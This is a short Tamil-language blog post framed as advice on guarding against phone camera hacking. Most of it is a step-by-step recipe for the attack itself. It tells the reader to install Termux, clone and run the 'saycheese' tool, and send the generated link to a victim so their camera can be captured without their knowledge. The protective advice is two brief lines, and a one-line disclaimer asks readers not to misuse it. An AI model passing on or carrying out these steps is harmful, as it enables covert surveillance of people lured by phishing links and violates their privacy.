கேமரா ஹேக்கிங்கிலிருந்து பாதுக்காத்துகொள்வது எப்படி
வணக்கம் நண்பர்களே
இந்த பதிவில் நாம் எதை பற்றி பார்க்க போகிறோம் என்றால் ,நாம் எல்லாருக்கும் புகைபடம் எடுக்கும் பழக்கம் உண்டு ,ஆனால் ஹேக்கர்கள் நம்முடைய போனின் கேமராவை ஹேக் செய்து நமக்கே தெரியாமல் நம்மை கண்காணிப்பார்கள் ,அது எப்படி மற்றும் அவற்றிலிருந்து நம்மை எப்படி பாதுக்காத்து கொள்வது என்று இதில் காண்போம்
திருட தெரிந்தால் தான் திருடனிடமிருந்து நம்மை பாதுக்காத்துகொள்ள முடியும்
இதை யாரும் தவறான வழியில் பயன்படுத்த வேண்டாம்
கேமராவை எப்படி ஹேக் செய்வது:
1. TERMUX செயலியை ஏற்றி கொள்ளவும்[play store]
2.பின்வருவனவற்றை காப்பி பேஸ்ட் செய்யவும்
3.git clone https://github.com/thelinuxchoice/saycheese
4.cd saycheese
5.ls
6.bash saycheese.sh
வரும் லிங்கை அனுப்பவும்
இதை பயன்படுத்தும் போது உங்கள் hotspot டை ஆன் செய்ய வேண்டும்
பாதுக்காத்துகொள்ளும் வழி:
1.எந்த லிங்கையும் தொட வேண்டாம் ,
2உங்களுடைய BROWSER ரில் site settingsசென்று கேமராவை பிலாக் செய்யவும்
நன்றி
உங்களை வேறுவொரு பதிவில் சந்திக்கின்றேன்
G.விக்னேஷ்
Comments
Post a Comment